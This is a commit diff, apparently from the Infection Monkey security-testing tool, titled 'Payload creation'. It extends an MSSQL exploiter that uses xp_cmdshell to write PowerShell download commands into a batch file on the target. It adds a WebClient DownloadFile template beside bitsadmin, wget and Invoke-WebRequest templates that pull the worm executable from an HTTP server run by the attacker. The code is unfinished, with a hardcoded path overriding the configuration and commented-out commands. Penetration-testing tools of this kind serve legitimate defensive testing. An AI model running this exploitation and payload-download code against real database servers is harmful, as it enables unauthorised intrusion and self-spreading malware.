Payload creation
This commit is contained in:
parent
75f26f921e
commit
d2b5e314c1
|
@ -3,8 +3,12 @@ import logging
|
|||
|
||||
import pymssql
|
||||
|
||||
from infection_monkey.exploit import HostExploiter, mssqlexec_utils
|
||||
from infection_monkey.exploit import HostExploiter, mssqlexec_utils, tools
|
||||
from common.utils.exploit_enum import ExploitType
|
||||
from infection_monkey.exploit.tools import HTTPTools
|
||||
from infection_monkey.config import WormConfiguration
|
||||
from infection_monkey.model import RDP_CMDLINE_HTTP
|
||||
|
||||
|
||||
__author__ = 'Maor Rayzin'
|
||||
|
||||
|
@ -73,6 +77,31 @@ class MSSQLExploiter(HostExploiter):
|
|||
|
||||
chosen_attack = self.attacks_list[0](payload, cursor, self.host)
|
||||
|
||||
|
||||
|
||||
|
||||
# Get monkey exe for host and it's path
|
||||
src_path = tools.get_target_monkey(self.host)
|
||||
if not src_path:
|
||||
LOG.info("Can't find suitable monkey executable for host %r", self.host)
|
||||
return False
|
||||
# Create server for http download and wait for it's startup.
|
||||
http_path, http_thread = HTTPTools.create_locked_transfer(self.host, src_path)
|
||||
if not http_path:
|
||||
LOG.debug("Exploiter failed, http transfer creation failed.")
|
||||
return False
|
||||
# TODO choose bit version
|
||||
dst_path = WormConfiguration.dropper_target_path_win_64
|
||||
dst_path = "c:\\windows\\temp\\monkey64.exe"
|
||||
|
||||
command = RDP_CMDLINE_HTTP % {'http_path': http_path, 'monkey_path': dst_path}
|
||||
LOG.info("Started http server on %s", http_path)
|
||||
tmp_file_path = "c:\\windows\\temp\\monkey_tmp.bat"
|
||||
commands = [r"xp_cmdshell 'echo powershell (new-object System.Net.WebClient).DownloadFile(\" > %s'" % tmp_file_path]
|
||||
commands2 = [r"xp_cmdshell 'echo powershell >> c:\\windows\\temp\\temp.bat'"]
|
||||
chosen_attack.execute_command(commands2)
|
||||
|
||||
|
||||
if chosen_attack.send_payload():
|
||||
LOG.debug('Payload: {0} has been successfully sent to host'.format(payload))
|
||||
if chosen_attack.execute_payload():
|
||||
|
|
|
@ -5,6 +5,7 @@ import logging
|
|||
import pymssql
|
||||
|
||||
from infection_monkey.exploit.tools import get_interface_to_target
|
||||
from infection_monkey.network.info import get_free_tcp_port
|
||||
from pyftpdlib.authorizers import DummyAuthorizer
|
||||
from pyftpdlib.handlers import FTPHandler
|
||||
from pyftpdlib.servers import FTPServer
|
||||
|
@ -21,6 +22,8 @@ FTP_SERVER_PASSWORD = 'force'
|
|||
FTP_WORK_DIR_WINDOWS = os.path.expandvars(r'%TEMP%/')
|
||||
FTP_WORK_DIR_LINUX = '/tmp/'
|
||||
|
||||
UPLOAD_COMMANDS = []
|
||||
|
||||
LOG = logging.getLogger(__name__)
|
||||
|
||||
|
||||
|
@ -54,7 +57,7 @@ class FTP(object):
|
|||
handler = FTPHandler
|
||||
handler.authorizer = authorizer
|
||||
|
||||
address = (get_interface_to_target(self.dst_ip), FTP_SERVER_PORT)
|
||||
address = (get_interface_to_target(self.dst_ip), get_free_tcp_port())
|
||||
|
||||
# Configuring the server using the address and handler. Global usage in stop_server thats why using self keyword
|
||||
self.server = FTPServer(address, handler)
|
||||
|
@ -103,6 +106,29 @@ class CmdShellAttack(AttackHost):
|
|||
self.ftp_server, self.ftp_server_p = self.__init_ftp_server(host)
|
||||
self.cursor = cursor
|
||||
self.attacker_ip = get_interface_to_target(host.ip_addr)
|
||||
self.host = host
|
||||
|
||||
def execute_command(self, cmds):
|
||||
ftp_server, ftp_server_p = self.__init_ftp_server(self.host)
|
||||
if ftp_server_p and ftp_server:
|
||||
#command = "xp_cmdshell \""+cmd+"\""
|
||||
#command = "xp_cmdshell \"C:\\download.bat\""
|
||||
#command = "EXEC xp_cmdshell \"c:\\download.bat\""
|
||||
|
||||
|
||||
try:
|
||||
# Running the cmd on remote host
|
||||
for cmd in cmds:
|
||||
self.cursor.execute(cmd)
|
||||
sleep(0.5)
|
||||
except Exception as e:
|
||||
LOG.error('Error sending the payload using xp_cmdshell to host', exc_info=True)
|
||||
self.ftp_server_p.terminate()
|
||||
return False
|
||||
return True
|
||||
else:
|
||||
LOG.error("Couldn't establish an FTP server for the dropout")
|
||||
return False
|
||||
|
||||
def send_payload(self):
|
||||
"""
|
||||
|
|
|
@ -18,6 +18,7 @@ DELAY_DELETE_CMD = 'cmd /c (for /l %%i in (1,0,2) do (ping -n 60 127.0.0.1 & del
|
|||
|
||||
# Commands used for downloading monkeys
|
||||
POWERSHELL_HTTP_UPLOAD = "powershell -NoLogo -Command \"Invoke-WebRequest -Uri \'%(http_path)s\' -OutFile \'%(monkey_path)s\' -UseBasicParsing\""
|
||||
POWERSHELL_UPLOAD_SHORT = "powershell (new-object System.Net.WebClient).DownloadFile('%(http_path)s','%(monkey_path)s')"
|
||||
WGET_HTTP_UPLOAD = "wget -O %(monkey_path)s %(http_path)s"
|
||||
RDP_CMDLINE_HTTP = 'bitsadmin /transfer Update /download /priority high %(http_path)s %(monkey_path)s'
|
||||
CHMOD_MONKEY = "chmod +x %(monkey_path)s"
|
||||
|
|
File diff suppressed because it is too large
Load Diff
Loading…
Reference in New Issue